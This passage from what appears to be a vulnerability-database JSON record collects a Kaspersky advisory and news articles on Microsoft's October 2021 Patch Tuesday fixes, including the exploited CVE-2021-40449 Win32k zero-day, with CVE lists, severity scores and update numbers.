"cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*"]}], "kaspersky": [{"lastseen": "2022-01-19T17:39:26", "description": "### *Detect date*:\n10/12/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, bypass security restrictions, obtain sensitive information, spoof user interface, execute arbitrary code, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) \nWindows RT 8.1 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server, version 20H2 (Server Core Installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 11 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2022 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 11 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2012 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2022 \nWindows Server 2012 R2 (Server Core installation) \nWindows 8.1 for x64-based systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 8.1 for 32-bit systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-40464](<https://nvd.nist.gov/vuln/detail/CVE-2021-40464>) \n[CVE-2021-40477](<https://nvd.nist.gov/vuln/detail/CVE-2021-40477>) \n[CVE-2021-41337](<https://nvd.nist.gov/vuln/detail/CVE-2021-41337>) \n[CVE-2021-40470](<https://nvd.nist.gov/vuln/detail/CVE-2021-40470>) \n[CVE-2021-41336](<https://nvd.nist.gov/vuln/detail/CVE-2021-41336>) \n[CVE-2021-40455](<https://nvd.nist.gov/vuln/detail/CVE-2021-40455>) \n[CVE-2021-41345](<https://nvd.nist.gov/vuln/detail/CVE-2021-41345>) \n[CVE-2021-41335](<https://nvd.nist.gov/vuln/detail/CVE-2021-41335>) \n[CVE-2021-40468](<https://nvd.nist.gov/vuln/detail/CVE-2021-40468>) \n[CVE-2021-40449](<https://nvd.nist.gov/vuln/detail/CVE-2021-40449>) \n[CVE-2021-40488](<https://nvd.nist.gov/vuln/detail/CVE-2021-40488>) \n[CVE-2021-38663](<https://nvd.nist.gov/vuln/detail/CVE-2021-38663>) \n[CVE-2021-40476](<https://nvd.nist.gov/vuln/detail/CVE-2021-40476>) \n[CVE-2021-41342](<https://nvd.nist.gov/vuln/detail/CVE-2021-41342>) \n[CVE-2021-26442](<https://nvd.nist.gov/vuln/detail/CVE-2021-26442>) \n[CVE-2021-40461](<https://nvd.nist.gov/vuln/detail/CVE-2021-40461>) \n[CVE-2021-41339](<https://nvd.nist.gov/vuln/detail/CVE-2021-41339>) \n[CVE-2021-40467](<https://nvd.nist.gov/vuln/detail/CVE-2021-40467>) \n[CVE-2021-41340](<https://nvd.nist.gov/vuln/detail/CVE-2021-41340>) \n[CVE-2021-41330](<https://nvd.nist.gov/vuln/detail/CVE-2021-41330>) \n[CVE-2021-40443](<https://nvd.nist.gov/vuln/detail/CVE-2021-40443>) \n[CVE-2021-40489](<https://nvd.nist.gov/vuln/detail/CVE-2021-40489>) \n[CVE-2021-40463](<https://nvd.nist.gov/vuln/detail/CVE-2021-40463>) \n[CVE-2021-40475](<https://nvd.nist.gov/vuln/detail/CVE-2021-40475>) \n[CVE-2021-41343](<https://nvd.nist.gov/vuln/detail/CVE-2021-41343>) \n[CVE-2021-41346](<https://nvd.nist.gov/vuln/detail/CVE-2021-41346>) \n[CVE-2021-40478](<https://nvd.nist.gov/vuln/detail/CVE-2021-40478>) \n[CVE-2021-40456](<https://nvd.nist.gov/vuln/detail/CVE-2021-40456>) \n[CVE-2021-40462](<https://nvd.nist.gov/vuln/detail/CVE-2021-40462>) \n[CVE-2021-36970](<https://nvd.nist.gov/vuln/detail/CVE-2021-36970>) \n[CVE-2021-38662](<https://nvd.nist.gov/vuln/detail/CVE-2021-38662>) \n[CVE-2021-41357](<https://nvd.nist.gov/vuln/detail/CVE-2021-41357>) \n[CVE-2021-41332](<https://nvd.nist.gov/vuln/detail/CVE-2021-41332>) \n[CVE-2021-40466](<https://nvd.nist.gov/vuln/detail/CVE-2021-40466>) \n[CVE-2021-41331](<https://nvd.nist.gov/vuln/detail/CVE-2021-41331>) \n[CVE-2021-38672](<https://nvd.nist.gov/vuln/detail/CVE-2021-38672>) \n[CVE-2021-40469](<https://nvd.nist.gov/vuln/detail/CVE-2021-40469>) \n[CVE-2021-41338](<https://nvd.nist.gov/vuln/detail/CVE-2021-41338>) \n[CVE-2021-40450](<https://nvd.nist.gov/vuln/detail/CVE-2021-40450>) \n[CVE-2021-41347](<https://nvd.nist.gov/vuln/detail/CVE-2021-41347>) \n[CVE-2021-36953](<https://nvd.nist.gov/vuln/detail/CVE-2021-36953>) \n[CVE-2021-40460](<https://nvd.nist.gov/vuln/detail/CVE-2021-40460>) \n[CVE-2021-26441](<https://nvd.nist.gov/vuln/detail/CVE-2021-26441>) \n[CVE-2021-40465](<https://nvd.nist.gov/vuln/detail/CVE-2021-40465>) \n[CVE-2021-40454](<https://nvd.nist.gov/vuln/detail/CVE-2021-40454>) \n[CVE-2021-41361](<https://nvd.nist.gov/vuln/detail/CVE-2021-41361>) \n[CVE-2021-41334](<https://nvd.nist.gov/vuln/detail/CVE-2021-41334>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *CVE-IDS*:\n[CVE-2021-36970](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36970>)4.3Warning \n[CVE-2021-40455](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40455>)2.1Warning \n[CVE-2021-38662](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38662>)4.9Warning \n[CVE-2021-41335](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41335>)7.2High \n[CVE-2021-40449](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40449>)4.6Warning \n[CVE-2021-38663](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38663>)2.1Warning \n[CVE-2021-41342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41342>)6.8High \n[CVE-2021-26442](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26442>)4.6Warning \n[CVE-2021-41332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41332>)4.0Warning \n[CVE-2021-40466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40466>)4.6Warning \n[CVE-2021-41331](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41331>)6.8High \n[CVE-2021-40469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40469>)6.5High \n[CVE-2021-41340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41340>)6.8High \n[CVE-2021-40467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40467>)4.6Warning \n[CVE-2021-36953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36953>)5.0Critical \n[CVE-2021-40489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40489>)7.2High \n[CVE-2021-40443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40443>)4.6Warning \n[CVE-2021-40460](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40460>)4.0Warning \n[CVE-2021-40465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40465>)6.8High \n[CVE-2021-41343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41343>)2.1Warning \n[CVE-2021-40464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40464>)5.2High \n[CVE-2021-40477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40477>)4.6Warning \n[CVE-2021-41337](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41337>)4.0Warning \n[CVE-2021-40470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40470>)4.6Warning \n[CVE-2021-41336](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41336>)2.1Warning \n[CVE-2021-41345](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41345>)7.2High \n[CVE-2021-40468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40468>)2.1Warning \n[CVE-2021-40488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40488>)7.2High \n[CVE-2021-40476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40476>)6.8High \n[CVE-2021-40461](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40461>)5.2High \n[CVE-2021-41339](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41339>)4.6Warning \n[CVE-2021-41330](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41330>)6.8High \n[CVE-2021-40463](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40463>)4.0Warning \n[CVE-2021-40475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40475>)2.1Warning \n[CVE-2021-41346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41346>)4.6Warning \n[CVE-2021-40478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40478>)7.2High \n[CVE-2021-40456](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40456>)5.0Critical \n[CVE-2021-40462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40462>)6.8High \n[CVE-2021-41357](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41357>)4.6Warning \n[CVE-2021-38672](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38672>)5.2High \n[CVE-2021-41338](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41338>)2.1Warning \n[CVE-2021-40450](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40450>)4.6Warning \n[CVE-2021-41347](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41347>)4.6Warning \n[CVE-2021-26441](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26441>)4.6Warning \n[CVE-2021-40454](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40454>)2.1Warning \n[CVE-2021-41361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41361>)3.5Warning \n[CVE-2021-41334](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41334>)4.6Warning\n\n### *KB list*:\n[5006699](<http://support.microsoft.com/kb/5006699>) \n[5006672](<http://support.microsoft.com/kb/5006672>) \n[5006674](<http://support.microsoft.com/kb/5006674>) \n[5006670](<http://support.microsoft.com/kb/5006670>) \n[5006667](<http://support.microsoft.com/kb/5006667>) \n[5006669](<http://support.microsoft.com/kb/5006669>) \n[5006729](<http://support.microsoft.com/kb/5006729>) \n[5006671](<http://support.microsoft.com/kb/5006671>) \n[5006732](<http://support.microsoft.com/kb/5006732>) \n[5006675](<http://support.microsoft.com/kb/5006675>) \n[5006714](<http://support.microsoft.com/kb/5006714>) \n[5006739](<http://support.microsoft.com/kb/5006739>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-12T00:00:00", "type": "kaspersky", "title": "KLA12310 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26441", "CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-38672", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40450", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40456", "CVE-2021-40460", "CVE-2021-40461", "CVE-2021-40462", "CVE-2021-40463", "CVE-2021-40464", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40468", "CVE-2021-40469", "CVE-2021-40470", "CVE-2021-40475", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41330", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41334", "CVE-2021-41335", "CVE-2021-41336", "CVE-2021-41337", "CVE-2021-41338", "CVE-2021-41339", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343", "CVE-2021-41345", "CVE-2021-41346", "CVE-2021-41347", "CVE-2021-41357", "CVE-2021-41361"], "modified": "2022-01-18T00:00:00", "id": "KLA12310", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12310/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:14", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjpS0YPSnhzLfSL9Jdi2DupcJJqAjphhWzoP9_fp_xtPC8-pChF6NHiFf2yseIsIK4RPOzJU2HVLhEjrorjtEGyIdtZu62aWNuJgjnxL8wUynqwh5mfitCBOoYcUhmX4R8QpL9YrbFCn0HxDj7Jy5niDIgNRhN0vbF3NGFMqSgUUlm85nkuubS8bZka>)\n\nMicrosoft on Tuesday rolled out [security patches](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct>) to contain a total of 71 vulnerabilities in Microsoft Windows and other software, including a fix for an actively exploited privilege escalation vulnerability that could be exploited in conjunction with remote code execution bugs to take control over vulnerable systems.\n\nTwo of the addressed security flaws are rated Critical, 68 are rated Important, and one is rated Low in severity, with three of the issues listed as publicly known at the time of the release. The four zero-days are as follows \u2014\n\n * [**CVE-2021-40449**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40449>) (CVSS score: 7.8) - Win32k Elevation of Privilege Vulnerability\n * [**CVE-2021-41335**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41335>) (CVSS score: 7.8) - Windows Kernel Elevation of Privilege Vulnerability\n * [**CVE-2021-40469**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40469>) (CVSS score: 7.2) - Windows DNS Server Remote Code Execution Vulnerability\n * [**CVE-2021-41338**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41338>) (CVSS score: 5.5) - Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability\n\nAt the top of the list is CVE-2021-40449, a use-after-free vulnerability in the Win32k kernel driver discovered by Kaspersky as being exploited in the wild in late August and early September 2021 as part of a widespread espionage campaign targeting IT companies, defense contractors, and diplomatic entities. The Russian cybersecurity firm dubbed the threat cluster \"MysterySnail.\"\n\n\"Code similarity and re-use of C2 [command-and-control] infrastructure we discovered allowed us to connect these attacks with the actor known as IronHusky and Chinese-speaking APT activity dating back to 2012,\" Kaspersky researchers Boris Larin and Costin Raiu [said](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) in a technical write-up, with the infection chains leading to the deployment of a remote access trojan capable of collecting and exfiltrating system information from compromised hosts before reaching out to its C2 server for further instructions.\n\nOther bugs of note include remote code execution vulnerabilities affecting Microsoft Exchange Server ([CVE-2021-26427](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26427>)), Windows Hyper-V ([CVE-2021-38672](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38672>) and [CVE-2021-40461](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40461>)), SharePoint Server ([CVE-2021-40487](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40487>) and [CVE-2021-41344](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41344>)), and Microsoft Word ([CVE-2021-40486](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40486>)) as well as an information disclosure flaw in Rich Text Edit Control ([CVE-2021-40454](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40454>)).\n\nCVE-2021-26427, which has a CVSS score of 9.0 and was identified by the U.S. National Security Agency, once again underscoring that \"Exchange servers are high-value targets for hackers looking to penetrate business networks,\" Bharat Jogi, senior manager of vulnerability and threat research at Qualys, said.\n\nThe October Patch Tuesday release is rounded out by fixes for two shortcomings newly discovered in the Print Spooler component \u2014 [CVE-2021-41332](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41332>) and [CVE-2021-36970](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36970>) \u2014 each concerning an information disclosure bug and a spoofing vulnerability, which has been tagged with an \"Exploitation More Likely\" exploitability index assessment.\n\n\"A spoofing vulnerability usually indicates that an attacker can impersonate or identify as another user,\" security researcher ollypwn [noted](<https://twitter.com/ollypwn/status/1448064117378584576>) in a Twitter thread. \"In this case, it looks like an attacker can abuse the Spooler service to upload arbitrary files to other servers.\"\n\n### Software Patches From Other Vendors\n\nIn addition to Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-10-01>)\n * [Apple](<https://thehackernews.com/2021/10/apple-releases-urgent-iphone-and-ipad.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-October/thread.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=587169983>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-13T05:49:00", "type": "thn", "title": "Update Your Windows PCs Immediately to Patch New 0-Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26427", "CVE-2021-36970", "CVE-2021-38672", "CVE-2021-40449", "CVE-2021-40454", "CVE-2021-40461", "CVE-2021-40469", "CVE-2021-40486", "CVE-2021-40487", "CVE-2021-41332", "CVE-2021-41335", "CVE-2021-41338", "CVE-2021-41344"], "modified": "2021-10-15T14:12:48", "id": "THN:57C3D6DDFA31EA2EA2B6BF2A747A612C", "href": "https://thehackernews.com/2021/10/update-your-windows-pcs-immediately-to.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-10-20T08:35:45", "description": "Yesterday we told you about [Apple\u2019s latest patches](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/update-now-apple-patches-another-privilege-escalation-bug-in-ios-and-ipados/>). Today we turn to Microsoft and its [Patch Tuesday](<https://msrc.microsoft.com/update-guide/en-us>). \n\nMicrosoft tends to provide a lot of information around its patches and, so, there&#x27;s a lot to digest and piece together to give you an overview of the most important ones. In total, Microsoft has fixed 71 Windows vulnerabilities, 81 if you include those for Microsoft Edge.\n\nOne of the vulnerabilities immediately jumps out since it was used in the wild as part of the MysterySnail attacks, attributed by the researchers that discovered it to a Chinese speaking APT group called IronHusky.\n\n### MysterySnail\n\nEarlier this month, researchers [discovered](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) that a zero-day exploit was used in widespread espionage campaigns against IT companies, military contractors, and diplomatic entities. The payload of these MysterySnail attacks is a [Remote Access Trojan (RAT)](<https://blog.malwarebytes.com/threats/remote-access-trojan-rat/>). The actively exploited vulnerability allows malware or an attacker to gain elevated privileges on a Windows device. So far, the MysterySnail RAT has only been spotted on Windows Servers, but the vulnerability can also be used against non-server Windows Operating Systems.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one is listed as [CVE-2021-40449](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40449>), a Win32k Elevation of Privilege (EoP) vulnerability, which means the vulnerability allows a user to raise their permissions.\n\n### PrintNightmare\n\nI scared you by mentioning [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>), right? Well, that may not be completely in vain. The same researchers that discovered the PrintNightmare vulnerability have found yet another vulnerability in Microsoft\u2019s Windows Print Spooler. This one is listed as [CVE-2021-36970](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36970>), a Windows Print Spooler spoofing vulnerability. The exploitation is known to be easy, and the attack may be initiated remotely. No form of authentication is needed for a successful exploitation, but it does require some action by the intended target. We may be hearing more about this one.\n\n### Exchange again\n\nAn Exchange bug that gets a [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.0 out of 10 is enough to make my hair stand on end. Listed as [CVE-2021-26427](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26427>), this one is a Microsoft Exchange Server Remote Code Execution (RCE) vulnerability. The exploitation appears to be easy and the attack can be initiated remotely. A single authentication is required for exploitation, so the attacker will need to have some kind of access to exploit this one, which may be why Microsoft listed it as \u201cexploitation less likely.\u201d Exchange Servers are an attractive target and so we have seen a lot of attacks. One worrying [flaw reveals users\u2019 passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/microsoft-exchange-autodiscover-flaw-reveals-users-passwords/>) and might provide attackers with the credentials they need to use this vulnerability.\n\n### Critical Microsoft Word vulnerability\n\nOne of the three vulnerabilities classified as critical is an RCE vulnerability in Word, listed as [CVE-2021-40486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40486>). The vulnerability could allow a remote attacker to trick a victim into opening a specially crafted file, executing arbitrary code on their system.\n\nThe other two critical vulnerabilities are RCE flaws in Windows Hyper-V, the virtualization component built into Windows. These vulnerabilities are listed as [CVE-2021-38672](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38672>) and [CVE-2021-40461](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40461>).\n\n### Windows DNS Server RCE\n\nThe last one is only of interest if you are running a server that is configured to act as a DNS server. Listed as [CVE-2021-40469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40469>), a Windows DNS Server Remote Code Execution vulnerability. The exploitation is known to be easy. The attack may be launched remotely, but the exploitation requires an enhanced level of successful authentication. The vulnerability was disclosed in the form of a Proof-of-Concept (PoC). While it may not be up to you to maintain or patch a DNS server, it&#x27;s good to know that this vulnerability exists in case we see weird connection issues as a result of [a DNS hijack](<https://blog.malwarebytes.com/cybercrime/2015/09/dns-hijacks-what-to-look-for/>) or denial-of-service.\n\nWhile many details are still unknown, we have tried to list the ones we can expect to surface as real world problems if they are not patched as soon as possible.\n\nStay safe, everyone!\n\nThe post [Patch now! Microsoft fixes 71 Windows vulnerabilities in October Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/patch-now-microsoft-fixes-71-windows-vulnerabilities-in-october-patch-tuesday/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-10-13T15:41:24", "type": "malwarebytes", "title": "Patch now! Microsoft fixes 71 Windows vulnerabilities in October Patch Tuesday", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26427", "CVE-2021-36970", "CVE-2021-38672", "CVE-2021-40449", "CVE-2021-40461", "CVE-2021-40469", "CVE-2021-40486"], "modified": "2021-10-13T15:41:24", "id": "MALWAREBYTES:B448D31E6691905EFC547FAA3B80C971", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/patch-now-microsoft-fixes-71-windows-vulnerabilities-in-october-patch-tuesday/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-10-13T10:46:13", "description": "Today is Microsoft\u2019s October 2021 Patch Tuesday, and it delivers fixes for four zero-day vulnerabilities, one of which is being exploited in a far-reaching espionage campaign that delivers the new [MysterySnail RAT malware](<https://threatpost.com/windows-zero-day-exploited-espionage/175432/>) to Windows servers.\n\n[Microsoft reported](<https://msrc.microsoft.com/update-guide/vulnerability>) a total of 74 vulnerabilities, three of which are rated critical.\n\n## MysterySnail Exploits Win32K Bug\n\nSecurity researchers pointed to [CVE-2021-40449](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40449>), an elevation of privilege vulnerability in Win32k, as standing out from the crowd of patches, given that It\u2019s been exploited in the wild as a zero-day.\n\nThis summer, Kaspersky researchers discovered that the exploit was being used to elevate privileges and take over Windows servers as part of a Chinese-speaking advanced persistent threat (APT) campaign from the APT IronHusky.\n\nThe exploit chain ended with a freshly discovered remote access trojan (RAT) [dubbed MysterySnail](<https://threatpost.com/windows-zero-day-exploited-espionage/175432/>) being installed on compromised servers, with the goal of stealing data.\n\nBharat Jogi, Qualsys senior manager of vulnerability and threat research, told Threatpost on Tuesday that if 